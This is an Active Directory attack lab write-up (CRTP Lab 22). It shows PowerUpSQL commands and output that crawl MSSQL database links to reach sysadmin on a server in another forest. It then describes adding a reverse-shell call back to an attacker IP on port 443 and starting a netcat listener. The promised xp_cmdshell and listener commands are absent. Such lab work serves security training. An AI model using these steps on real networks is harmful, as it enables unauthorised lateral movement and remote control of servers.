CRTP Lab 22

Task

Get a reverse shell on a SQL server in eurocorp forest by abusing database links from dcorpmssql.

First, enumerate SQL servers in the domain and if student has privileges to connect to any of them. Run Invishell and use PowerUpSQL to enumerate.

PS C:\Users\student372> Import-Module C:\AD\Tools\PowerUpSQL-master\PowerUpSQL.psd1

# Look for SPNs that start with MSSQL*
PS C:\Users\student372> Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose

Since we can connect to dcorp-mssql, we can use Get-SQLServerLinkCrawl to crawl the database links automatically.

PS C:\Users\student372> Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Verbose


VERBOSE:  Server: EU-SQL24
VERBOSE: --------------------------------
VERBOSE:  - Link Path to server: DCORP-MSSQL -> DCORP-SQL1 -> DCORP-MGMT -> EU-SQL24.EU.EUROCORP.LOCAL
VERBOSE:  - Link Login: sa
VERBOSE:  - Link IsSysAdmin: 1
VERBOSE:  - Link Count: 0
VERBOSE:  - Links on this server:

We have sysadmin on EU-SQL24 server.

If xp_cmdshell is enabled, it is possible to execute commands on EU-SQL24.

To avoid dealing with a large number of quotes and escapes, use the following command:

To get a reverse shell, we'll use Invoke-PowerShellTcpEx.ps1

Create a copy of Invoke-PowerShellTcpEx.ps1 and rename it to Invoke-PowerShellTcpEx1.ps1.

Add "Power -Reverse -IPAddress 172.16.100.X -Port 443" (without quotes) to the end of the file.

Host the files on attacker HTTP server. Start a listener using netcat.

On Listener:

PreviousTrust Abuse - MSSQL ServersNextLateral Movement

Last updated